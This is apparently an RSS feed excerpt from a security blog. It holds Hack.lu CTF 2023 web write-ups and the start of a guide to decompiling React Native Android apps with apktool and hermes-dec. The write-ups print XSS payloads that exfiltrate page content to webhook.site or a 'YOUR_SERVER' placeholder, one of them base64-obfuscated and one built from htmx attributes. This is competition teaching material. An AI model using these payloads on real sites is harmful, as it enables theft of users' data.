    &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;html&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&amp;gt;&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;location&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;atob&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;dl&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;aHR0cHM6Ly93ZWJob29rLnNpdGUveW91ci1zZXJ2ZXI/ZGF0YT0=&lt;/span&gt;&lt;span class=&quot;dl&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;btoa&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;html&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt;
  &lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Now it’s time to decode and parse it to hex. Have you noticed these trash characters from before? We’ve got &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;missisB&lt;/code&gt; instead of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;missing&lt;/code&gt;. It may break our closing &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;&amp;lt;/script&amp;gt;&lt;/code&gt; tag. We’ll get rid of this issue by simply adding some random tag at the end of the script&lt;/p&gt;

&lt;div class=&quot;language-python highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;based91&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;script&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;&amp;lt;script&amp;gt;fetch(&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;)[&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;then&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;]((data) =&amp;gt; data[&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;text&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;]())[&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;then&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;]((html)=&amp;gt;location=atob(&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;aHR0cHM6Ly93ZWJob29rLnNpdGUveW91ci1zZXJ2ZXI/ZGF0YT0=&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;)+btoa(html))&amp;lt;/&amp;gt;&amp;lt;p&amp;gt;some tag&amp;lt;/p&amp;gt;&quot;&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;result&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;based91&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;decode&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;script&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;result&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;hex&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;())&lt;/span&gt;

&lt;span class=&quot;c1&quot;&gt;# f0afecd5baf39dac4294fc6dd286f809445ffb0db053e0adb4964677a7ca80e53c0b26c6157004c3e127107ded37c04e814160531bdd758d4365402d67b83360700a022f45a3cc14aa343a2acff513e49aa6e1436fa0ee472443f8433165989534423bd308ede71d1128b3cde436c4dfa9ccad5f10d8d4e0f08f0651410c054aedf14de6a0d55a22d9dcce
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Now it’s time to create an encoding. We can see the redirect is working (we’re redirected after creating this decoding). Let’s grab an id, report it to admin and check our log server&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2023-10-19/image-8.png&quot; alt=&quot;Alt text&quot; /&gt;&lt;/p&gt;

&lt;p&gt;And we’ve got something! Let’s decode the data&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2023-10-19/image-9.png&quot; alt=&quot;Alt text&quot; /&gt;&lt;/p&gt;

&lt;p&gt;And here’s the id! Let’s go back to the challenge page, open random decoding and replace the id url parameter&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2023-10-19/image-10.png&quot; alt=&quot;Alt text&quot; /&gt;&lt;/p&gt;

&lt;p&gt;so the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;flag&lt;/code&gt; is&lt;/p&gt;

&lt;div class=&quot;language-text highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;flag{bas3d_enc0dings_str1p_off_ur_sk1n}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h3 id=&quot;wrong-path-1&quot;&gt;wrong path 1&lt;/h3&gt;

&lt;p&gt;Trying to steal an admin cookie which was protected by &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;httpOnly&lt;/code&gt; flag and not accessible via &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;document.cookie&lt;/code&gt; from the FE&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2023-10-19/image-2.png&quot; alt=&quot;http only cookie flag&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;wrong-path-2&quot;&gt;wrong path 2&lt;/h3&gt;

&lt;p&gt;Trying with different versions of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;eval&lt;/code&gt; with the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;no-eval&lt;/code&gt; policy in place&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2023-10-19/image-3.png&quot; alt=&quot;content security policy&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;wrong-path-3&quot;&gt;wrong path 3&lt;/h3&gt;

&lt;p&gt;Decoding &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;session&lt;/code&gt; using &lt;a href=&quot;https://github.com/Paradoxis/Flask-Unsign&quot;&gt;flask-unsign&lt;/a&gt; and &lt;a href=&quot;https://github.com/Paradoxis/Flask-Unsign-Wordlist&quot;&gt;flask-unsign-wordlist&lt;/a&gt;. Secret is long and random so nearly impossible to crack&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2023-10-19/image-4.png&quot; alt=&quot;flask-unsign-result&quot; /&gt;&lt;/p&gt;

&lt;!-- &lt;hr style=&quot;margin: 16px 0px 16px 0px&quot; /&gt; --&gt;
&lt;!-- &lt;script
id=&quot;diffblog-plugin-script&quot;
async=&quot;false&quot;
src=&quot;https://diff.blog/static/js/diffblog_plugin_v1.js&quot;
&gt;&lt;/script&gt;
&lt;script&gt;
document
.getElementById(&quot;diffblog-plugin-script&quot;)
.addEventListener(&quot;load&quot;, function () {
DiffBlog(&quot;l1hwfdcilg3r3t2hu2zoqweyod5ktr52272hdhm4rye43zyr1p&quot;);
});
&lt;/script&gt; --&gt;

&lt;script&gt;
  // Set utterances theme based on current theme
  (function () {
    function getUtterancesTheme() {
      var theme = localStorage.getItem(&apos;theme&apos;) || &apos;auto&apos;;
      var utterancesTheme;

      if (theme === &apos;dark&apos;) {
        utterancesTheme = &apos;github-dark&apos;;
      } else if (theme === &apos;light&apos;) {
        utterancesTheme = &apos;github-light&apos;;
      } else {
        // Auto mode - check system preference
        if (
          window.matchMedia &amp;&amp;
          window.matchMedia(&apos;(prefers-color-scheme: dark)&apos;).matches
        ) {
          utterancesTheme = &apos;github-dark&apos;;
        } else {
          utterancesTheme = &apos;github-light&apos;;
        }
      }
      return utterancesTheme;
    }

    var utterancesTheme = getUtterancesTheme();

    var script = document.createElement(&apos;script&apos;);
    script.src = &apos;https://utteranc.es/client.js&apos;;
    script.setAttribute(&apos;repo&apos;, &apos;robi24/robi24.github.io&apos;);
    script.setAttribute(&apos;issue-term&apos;, &apos;pathname&apos;);
    script.setAttribute(&apos;theme&apos;, utterancesTheme);
    script.setAttribute(&apos;crossorigin&apos;, &apos;anonymous&apos;);
    script.async = true;

    // Listen for utterances ready event
    window.addEventListener(&apos;message&apos;, function (event) {
      if (event.origin !== &apos;https://utteranc.es&apos;) return;

      // When utterances loads, immediately update theme
      var iframe = document.querySelector(&apos;.utterances-frame&apos;);
      if (iframe) {
        var currentTheme = getUtterancesTheme();
        var message = {
          type: &apos;set-theme&apos;,
          theme: currentTheme,
        };
        iframe.contentWindow.postMessage(message, &apos;https://utteranc.es&apos;);
      }
    });

    var container = document.getElementById(&apos;utterances-container&apos;);
    if (container) {
      container.appendChild(script);
    }
  })();
&lt;/script&gt;

&lt;div id=&quot;utterances-container&quot;&gt;&lt;/div&gt;

&lt;script async=&quot;&quot; src=&quot;https://www.googletagmanager.com/gtag/js?id=G-4SN4JSS2WD&quot;&gt;&lt;/script&gt;

&lt;script&gt;
  window.dataLayer = window.dataLayer || [];
  function gtag() {
    dataLayer.push(arguments);
  }
  gtag(&apos;js&apos;, new Date());
  gtag(&apos;config&apos;, &apos;G-4SN4JSS2WD&apos;);
&lt;/script&gt;

</description>
				<pubDate>Thu, 19 Oct 2023 06:30:00 +0000</pubDate>
				<link>https://bitwornhat.com/posts/ctf-hack-lu-web-based-encoding</link>
				<guid isPermaLink="true">https://bitwornhat.com/posts/ctf-hack-lu-web-based-encoding</guid>
			</item>
		
			<item>
				<title>Hack.lu CTF Awesomenotes 1 web challenge writeup</title>
				<description>&lt;h2 id=&quot;awesomenotes-1&quot;&gt;Awesomenotes 1&lt;/h2&gt;

&lt;p&gt;CTF name: &lt;strong&gt;&lt;a href=&quot;https://flu.xxx/info&quot;&gt;Hack.lu CTF 2023&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Challenge name: &lt;strong&gt;Awesomenotes 1&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Challenge description:&lt;/p&gt;

&lt;div class=&quot;language-text highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;We&apos;re excited to announce our new, revolutionary product: A note-taking app. This phenomenal product uses the most up-to-date, bleeding-edge tech in order to stay ahead of all potential security issues. No-one can pwn us.
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Challenge category: &lt;strong&gt;web&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Challenge points: &lt;strong&gt;88&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When: &lt;strong&gt;Fri, Oct. 13, 18:00 — Sun, Oct. 15, 18:00 UTC&lt;/strong&gt;&lt;/p&gt;

&lt;h3 id=&quot;tldr---solution&quot;&gt;TLDR - solution&lt;/h3&gt;

&lt;div class=&quot;language-html highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nt&quot;&gt;&amp;lt;div&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;hx-get=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;/api/note/flag?t=&quot;&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;hx-trigger=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;load delay:0.001s&quot;&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;hx-target=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;#report&quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&lt;/span&gt;get flag&lt;span class=&quot;nt&quot;&gt;&amp;lt;/div&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;div&lt;/span&gt;
  &lt;span class=&quot;na&quot;&gt;hx-get=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;YOUR_SERVER&quot;&lt;/span&gt;
  &lt;span class=&quot;na&quot;&gt;hx-on::config-request=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;event.detail.parameters[&apos;flag&apos;] = document.getElementById(&apos;report&apos;).innerHTML&quot;&lt;/span&gt;
  &lt;span class=&quot;na&quot;&gt;hx-trigger=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;load delay:0.8s&quot;&lt;/span&gt;
  &lt;span class=&quot;na&quot;&gt;hx-target=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;#report&quot;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;gt;&lt;/span&gt;
  send flag
&lt;span class=&quot;nt&quot;&gt;&amp;lt;/div&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h3 id=&quot;description&quot;&gt;Description&lt;/h3&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2023-10-15/image-4.png&quot; alt=&quot;description&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Challenge was marked as &lt;strong&gt;beginner friendly&lt;/strong&gt;. You’re greet with a simple web page where you can create and report a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;note&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2023-10-15/image-8.png&quot; alt=&quot;Landing page&quot; width=&quot;500&quot; /&gt;&lt;/p&gt;

&lt;p&gt;After checking the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;get_note&lt;/code&gt; function we knew the flag location (in a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;flag&lt;/code&gt; note) and that only admin had an access to it.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2023-10-15/image-1.png&quot; alt=&quot;get note code&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Another function &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;take_report&lt;/code&gt; is called by a bot after reporting a note. The last function &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;upload_note&lt;/code&gt; has some logic to sanitize a user input. After a quick look you find that &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;hx-&lt;/code&gt; tags are allowed.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2023-10-15/image-2.png&quot; alt=&quot;upload note code&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Another hint is in the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;note.html&lt;/code&gt; file.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2023-10-15/image-3.png&quot; alt=&quot;note html code&quot; /&gt;&lt;/p&gt;

&lt;p&gt;It should be clear by now that we need to prepare a note and use &lt;strong&gt;XSS&lt;/strong&gt; to send us a flag after we report it to admin and that &lt;a href=&quot;https://htmx.org/docs/&quot;&gt;htmx&lt;/a&gt; is used/allowed on the FE. There’s even an example 😉&lt;/p&gt;

&lt;p&gt;We used &lt;a href=&quot;https://webhook.site&quot;&gt;webhook.site&lt;/a&gt; as a temporary log server.&lt;/p&gt;

&lt;p&gt;The idea was to use &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;htmx&lt;/code&gt; to make two calls:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;first to get the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;flag&lt;/code&gt; note from &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/api/notes/flag&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;second to send the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;flag&lt;/code&gt; to our server&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;noteId&lt;/code&gt; is always added to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;hx-get=&quot;/api/note/&lt;/code&gt; on every &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;post&lt;/code&gt; call, so adding &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;?t=&lt;/code&gt; at the very end means we can ignore it. &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;hx-trigger&lt;/code&gt; sets the runtime delay. &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;hx-target&lt;/code&gt; is our target html element, so we used the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;report&lt;/code&gt; bottom link button with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;id=&quot;report&quot;&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2023-10-15/image-5.png&quot; alt=&quot;note view&quot; /&gt;&lt;/p&gt;

&lt;p&gt;We’ve got the first call ready (it fails with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;401&lt;/code&gt; while testing. It’s a good sign because we don’t have an access to the flag).&lt;/p&gt;

&lt;p&gt;The second part is all about &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;hx-on::config-request&lt;/code&gt;. In the &lt;a href=&quot;https://htmx.org/events/#htmx:configRequest&quot;&gt;docs&lt;/a&gt; we’ve found you can set event parameters via &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;event.detail.parameters[&apos;your_parameter&apos;]&lt;/code&gt;. We should already have the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;flag&lt;/code&gt; in &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;#report&lt;/code&gt; link, so all we need is to get the value via &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;document.getElementById(&apos;report&apos;).innerHTML&lt;/code&gt;. Last thing is to set the trigger to give some time for the first call to update the link.&lt;/p&gt;

&lt;p&gt;Send prepared note, wait for a request&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2023-10-15/image-7.png&quot; alt=&quot;request details&quot; /&gt;&lt;/p&gt;

&lt;p&gt;and you get the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;flag&lt;/code&gt;&lt;/p&gt;

&lt;div class=&quot;language-text highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;flag{C3r34l_1s_s0up_l1k3_1f_4gr33}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;!-- &lt;hr style=&quot;margin: 16px 0px 16px 0px&quot; /&gt; --&gt;
&lt;!-- &lt;script
id=&quot;diffblog-plugin-script&quot;
async=&quot;false&quot;
src=&quot;https://diff.blog/static/js/diffblog_plugin_v1.js&quot;
&gt;&lt;/script&gt;
&lt;script&gt;
document
.getElementById(&quot;diffblog-plugin-script&quot;)
.addEventListener(&quot;load&quot;, function () {
DiffBlog(&quot;l1hwfdcilg3r3t2hu2zoqweyod5ktr52272hdhm4rye43zyr1p&quot;);
});
&lt;/script&gt; --&gt;

&lt;script&gt;
  // Set utterances theme based on current theme
  (function () {
    function getUtterancesTheme() {
      var theme = localStorage.getItem(&apos;theme&apos;) || &apos;auto&apos;;
      var utterancesTheme;

      if (theme === &apos;dark&apos;) {
        utterancesTheme = &apos;github-dark&apos;;
      } else if (theme === &apos;light&apos;) {
        utterancesTheme = &apos;github-light&apos;;
      } else {
        // Auto mode - check system preference
        if (
          window.matchMedia &amp;&amp;
          window.matchMedia(&apos;(prefers-color-scheme: dark)&apos;).matches
        ) {
          utterancesTheme = &apos;github-dark&apos;;
        } else {
          utterancesTheme = &apos;github-light&apos;;
        }
      }
      return utterancesTheme;
    }

    var utterancesTheme = getUtterancesTheme();

    var script = document.createElement(&apos;script&apos;);
    script.src = &apos;https://utteranc.es/client.js&apos;;
    script.setAttribute(&apos;repo&apos;, &apos;robi24/robi24.github.io&apos;);
    script.setAttribute(&apos;issue-term&apos;, &apos;pathname&apos;);
    script.setAttribute(&apos;theme&apos;, utterancesTheme);
    script.setAttribute(&apos;crossorigin&apos;, &apos;anonymous&apos;);
    script.async = true;

    // Listen for utterances ready event
    window.addEventListener(&apos;message&apos;, function (event) {
      if (event.origin !== &apos;https://utteranc.es&apos;) return;

      // When utterances loads, immediately update theme
      var iframe = document.querySelector(&apos;.utterances-frame&apos;);
      if (iframe) {
        var currentTheme = getUtterancesTheme();
        var message = {
          type: &apos;set-theme&apos;,
          theme: currentTheme,
        };
        iframe.contentWindow.postMessage(message, &apos;https://utteranc.es&apos;);
      }
    });

    var container = document.getElementById(&apos;utterances-container&apos;);
    if (container) {
      container.appendChild(script);
    }
  })();
&lt;/script&gt;

&lt;div id=&quot;utterances-container&quot;&gt;&lt;/div&gt;

&lt;script async=&quot;&quot; src=&quot;https://www.googletagmanager.com/gtag/js?id=G-4SN4JSS2WD&quot;&gt;&lt;/script&gt;

&lt;script&gt;
  window.dataLayer = window.dataLayer || [];
  function gtag() {
    dataLayer.push(arguments);
  }
  gtag(&apos;js&apos;, new Date());
  gtag(&apos;config&apos;, &apos;G-4SN4JSS2WD&apos;);
&lt;/script&gt;

</description>
				<pubDate>Sun, 15 Oct 2023 20:30:00 +0000</pubDate>
				<link>https://bitwornhat.com/posts/ctf-hack-lu-web-awesomenotes</link>
				<guid isPermaLink="true">https://bitwornhat.com/posts/ctf-hack-lu-web-awesomenotes</guid>
			</item>
		
			<item>
				<title>React native android mobile app disassembly</title>
				<description>&lt;p&gt;You’re here because you didn’t find a proper “how to” article? Lucky you, I prepared smth &lt;em&gt;worth&lt;/em&gt; reading and it’s going to be a step-by-step guide of how to disassemble a react native android mobile app and check the JS code 😉&lt;/p&gt;

&lt;p&gt;First of all you need an &lt;a href=&quot;https://en.wikipedia.org/wiki/Apk_(file_format)&quot;&gt;.apk&lt;/a&gt; file. I assume you already have it, otherwise you wouldn’t be reading this. When I write this post, Google already introduced a new file type called &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ABB&lt;/code&gt;. You can read more &lt;a href=&quot;https://developer.android.com/guide/app-bundle&quot;&gt;here&lt;/a&gt; if you’re interested. Spoiler alert, it’s not going to change much for us! Why? It’s because at the very end google use this format to generate &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.apk&lt;/code&gt; files, so you don’t get your hands on the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.abb&lt;/code&gt; unless you’re an app developer and the one who build the app 🙂&lt;/p&gt;

&lt;p&gt;Nearly forgot to mention that disassembling an app &lt;a href=&quot;https://gayatri-panchal19.medium.com/decompilation-legal-or-illegal-160940a6bbe6&quot;&gt;may&lt;/a&gt; be illegal, so don’t tell your mother what you’re going to do 😆&lt;/p&gt;

&lt;p&gt;Have you already downloaded the &lt;a href=&quot;https://apktool.org/&quot;&gt;Apktool&lt;/a&gt;? It’s one of a few tools you can use, but I found it quite capable. And it just does the job. Get the latest version &lt;a href=&quot;https://bitbucket.org/iBotPeaches/apktool/downloads/&quot;&gt;here&lt;/a&gt; and follow the &lt;a href=&quot;https://apktool.org/docs/install&quot;&gt;download guide&lt;/a&gt;. When you open the link, you’ll find a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;wrapper script&lt;/code&gt;. And it’s called a wrapper for a reason! I paste you what’s inside: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;exec java $javaOpts -jar &quot;$jarpath&quot; &quot;$@&quot;&lt;/code&gt;. Oh, java 🤔 but you’ve probably already noticed it. The file you’ve just downloaded has &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.jar&lt;/code&gt; extension. If you’re lazy like me then just run&lt;/p&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;java &lt;span class=&quot;nt&quot;&gt;-jar&lt;/span&gt; ./apktool_2.8.1.jar d app.apk
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;and no need for any wrappers! We’ve got some output&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2023-08-05/s1.png&quot; alt=&quot;Apktool output&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Let’s play Indinana Jones and see what we can find. First of all, we’ve got few files&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2023-08-05/s2.png&quot; alt=&quot;Apktool output - files&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Let’s make one step back, and think for a sec. Most of mobile apps has some kind of &lt;em&gt;terms &amp;amp; conditions&lt;/em&gt; or &lt;em&gt;privacy policy&lt;/em&gt; section. If they use some external libs you can probably find a list of them there. You would be surprised how many things are laying around waiting to be noticed and how useful it can be later. You should gather/check it before you started disassembling an app and I think should mention it earlier in the first place, so.. we’re equal, don’t complain and move forward 😜&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;AndroidManifest.xml&lt;/code&gt; file is where you find app permissions, list of activities, services, providers etc etc. If it’s a RN app, then the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;assets&lt;/code&gt; folder is what you’re really looking for. Inside is &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;index.android.bundle&lt;/code&gt;. Oh yeah, we’ve finally found a bundle file 🎊 Double click and&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2023-08-05/s3.png&quot; alt=&quot;index.android.bundle file&quot; /&gt;&lt;/p&gt;

&lt;p&gt;and here we are with a wall of hex 💩 what do you do now? Why not trying &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;strings&lt;/code&gt;?&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2023-08-05/s4.png&quot; alt=&quot;strings output&quot; /&gt;&lt;/p&gt;

&lt;p&gt;When you scroll up and down randomly you can find some useful stuff. It’s just 22438 lines, so you should handle it! Jokes aside, I think we agree it’s not the most efficient way 😅 I’m here to help you so try the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;file&lt;/code&gt; command&lt;/p&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;file index.android.bundle
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;The output should be similar to this one&lt;/p&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;index.android.bundle: Hermes JavaScript bytecode, version 90
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;version&lt;/code&gt; may wary depending on the app and which react native version it uses. &lt;a href=&quot;https://reactnative.dev/docs/hermes&quot;&gt;Hermes&lt;/a&gt; is an engine. You can enable/disable it when you develop a RN app. It should improve the startup time and memory consumption. I wonder what would be an output if we disable &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;hermes&lt;/code&gt;. Feel free to test that and let me know down in the comments 🙂&lt;/p&gt;

&lt;p&gt;Anyway, now it’s time to look a tool, or more precisely, a decompiler which can output something more useful than this mess. Take a look at &lt;a href=&quot;https://labs.p1sec.com/2023/01/09/releasing-hermes-dec-an-open-source-disassembler-and-decompiler-for-the-react-native-hermes-bytecode/&quot;&gt;hermes-dec&lt;/a&gt;. Github link &lt;a href=&quot;https://github.com/P1sec/hermes-dec&quot;&gt;here&lt;/a&gt;. Btw, don’t forget to leave a star (it’s free!). Follow the docs, clone the repo and run&lt;/p&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;./hermes-dec/hbc_decompiler.py ./app/assets/index.android.bundle file_output.js
